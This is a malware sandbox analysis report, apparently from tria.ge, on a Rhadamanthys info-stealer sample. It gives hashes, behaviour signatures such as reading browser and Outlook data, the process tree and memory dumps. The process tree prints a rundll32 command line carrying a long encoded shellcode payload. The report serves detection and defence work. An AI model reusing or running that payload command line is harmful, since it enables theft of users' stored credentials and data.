Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    133s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/02/2023, 05:22

General

  • Target

    tmp.exe

  • Size

    369KB

  • MD5

    c901cbc0e7e675c98d6ccc17e453d99f

  • SHA1

    76f1958a6fe532b472f60361bff3b0f8bda2c86f

  • SHA256

    d5d5b80a12be4845f2c4d23cdf01b6a690ceddcb8bb923df7d59bf5cd2057a6f

  • SHA512

    3da5b084aafa0f700ada7a4675499032e9fa60557f8de3c01fc7983eda405d3d906bc581ffc4993e47b37663ca7932240d25b3e1fb45b8ed9471e9bce54566c2

  • SSDEEP

    6144:WMRGQL7XoNR9ZsekVOt/hihbxQLy+qKKwTAVYxQkINPNNrlwKwpxBm94QjV6ptCa:WMRGQvXuRHsqZhihbxgaKPixDrleGT

Malware Config

Signatures

  • Detect rhadamanthys stealer shellcode 2 IoCs
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Program crash 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4212
    • C:\Windows\system32\rundll32.exe
      "C:\Users\Admin\AppData\Roaming\nsis_unse56799a.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8FfqJwBHGwBYPwB3AFb6IQBSPwBGADQAeP4tAllIg+wo6AT|AgAASIPEKMP|zMzMTIlEJBj|SIlUJBBIiUz7JAhdAUiLRCQwb0iJBCSBAThIbwC|CEjHRCQQLQHrfQ6BARBIg8ABjwHdEIEBQEg5lgBzJf6fA4sMJEgDyEhfi8FIi0yrAVR7AP8D0UiLyooJiPcI68FmBWVIiwT7JWDz8DPJSItQ|xhIO9F0NkiD|8IgSIsCSDvC|3QqZoN4SBh1|xpMi0BQZkGD7zhrdAcREUt1CP4REHgQLnQFSIu|AOvVSItI|QDB|moAQFNVVldBVL9BVUFWQVddAWb|gTlNWk2L+Ez|i|JIi9kPhfz+8|BMY0k8QYE8|wlQRQAAD4XqvvPwQYuECYjz8IX|wEiNPAEPhNbeahGDvAmMLQEPhP3H8|BEi2cgRIv|XxyLdyREi0||GEwD4UwD2Uj|A|EzyUWFyQ|7hKTz8E2LxEGL|xBFM9JIA9OK|wKEwHQdQcHK7w0PvsD6AAFEA|3QvxF17EGB+qr||A18dA6DwQH|SYPABEE7yXP|aevGi8EPtwz|TkWLLItMA+vvdFgz7aoQdFFB+4sUwQDTM8mKAn9Mi8LrD8HJyBF7A8jlEAFBigDVEP|tM8Az9kE7DPm24BCmAIPGAYP4|why7usKSIvL|0H|1UmJBPeD|cXkEMQEO28Ycv2vZgFBX0FeQV2|QVxfXl1bMxdI74HsYAFkAIvp6P9m|v||SIXAD1uEmHUgTI2vAYsrEN|IM||om30gjV||BEyNRUYz0ovfy|9UJGiAIEyLr+APhGt1IEWoEDP3wIvTkSBIiXwk9SCmIHCAIEiL8A|zhEt1IKYgUEiNVv8IRI1HQEiNjP0khRFIi9jofP2ufiCNVkjeIBDiIcz28|DoZ+8gRIsGjdNXCEEgpiBYyiGJhGskgIcS3vPwiw7aII9YiYwkcREHMJEg6O0x7yCLnC0yTItdvzpIg|tsSIogMP9MiWQkOEyLpO4aMkyJXIQBhCTctocRhpKNEY1HSzCM+yTw8|BJi9To6e38BTCKnHgySI2E|ngyQYDzIY1PbPdEMBikAoPpAXX384G8eDIhUmV4v3VNi4Qk9CIxlPsk+DUBwkg72HL|OIP6bHYzRI17SUD6AJRBuACYAHqmIEDKIvh0GUS2ML7AMUmNVCRskSBJ34PobOhrgjBIi|3OpiB4SIX|dBLPi1VCTI4wGzFIjf9MJED|10iBxAB0IWEkLQgtAQ==
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Accesses Microsoft Outlook profiles
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • outlook_office_path
      • outlook_win_path
      PID:872
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 872 -s 532
        3⤵
        • Program crash
        PID:1292
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 696
      2⤵
      • Program crash
      PID:3436
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4212 -ip 4212
    1⤵
      PID:4616
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -pss -s 420 -p 872 -ip 872
      1⤵
        PID:4804

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\nsis_unse56799a.dll

        Filesize

        49KB

        MD5

        832890fded186835970d1d3302590138

        SHA1

        5385703e9dcde43e60928b2e9c941b7232468a6a

        SHA256

        438c088568093ad767802ba5e132efbd4e643ddf62e4996565c3b46719e3e576

        SHA512

        5cf752eac75b532b32501c9d469cbcb6638b49cf20df040554b37986cbe3c068a10e2ff69747b594b5b114111cbbe1cdfbbd0f394a7ac71b863e042414a68ae1

      • C:\Users\Admin\AppData\Roaming\nsis_unse56799a.dll

        Filesize

        49KB

        MD5

        832890fded186835970d1d3302590138

        SHA1

        5385703e9dcde43e60928b2e9c941b7232468a6a

        SHA256

        438c088568093ad767802ba5e132efbd4e643ddf62e4996565c3b46719e3e576

        SHA512

        5cf752eac75b532b32501c9d469cbcb6638b49cf20df040554b37986cbe3c068a10e2ff69747b594b5b114111cbbe1cdfbbd0f394a7ac71b863e042414a68ae1

      • memory/872-147-0x00007FF827630000-0x00007FF827642000-memory.dmp

        Filesize

        72KB

      • memory/872-146-0x00007FF451C40000-0x00007FF451D3A000-memory.dmp

        Filesize

        1000KB

      • memory/872-142-0x00007FF451C40000-0x00007FF451D3A000-memory.dmp

        Filesize

        1000KB

      • memory/872-141-0x000001C14DFF0000-0x000001C14DFF7000-memory.dmp

        Filesize

        28KB

      • memory/4212-136-0x0000000000621000-0x0000000000632000-memory.dmp

        Filesize

        68KB

      • memory/4212-137-0x0000000002270000-0x000000000228D000-memory.dmp

        Filesize

        116KB

      • memory/4212-132-0x0000000000621000-0x0000000000632000-memory.dmp

        Filesize

        68KB

      • memory/4212-135-0x0000000000400000-0x0000000000477000-memory.dmp

        Filesize

        476KB

      • memory/4212-143-0x00000000005FE000-0x000000000061F000-memory.dmp

        Filesize

        132KB

      • memory/4212-144-0x0000000000621000-0x0000000000632000-memory.dmp

        Filesize

        68KB

      • memory/4212-145-0x0000000002270000-0x000000000228D000-memory.dmp

        Filesize

        116KB

      • memory/4212-134-0x00000000021C0000-0x00000000021E5000-memory.dmp

        Filesize

        148KB

      • memory/4212-133-0x00000000005FE000-0x000000000061F000-memory.dmp

        Filesize

        132KB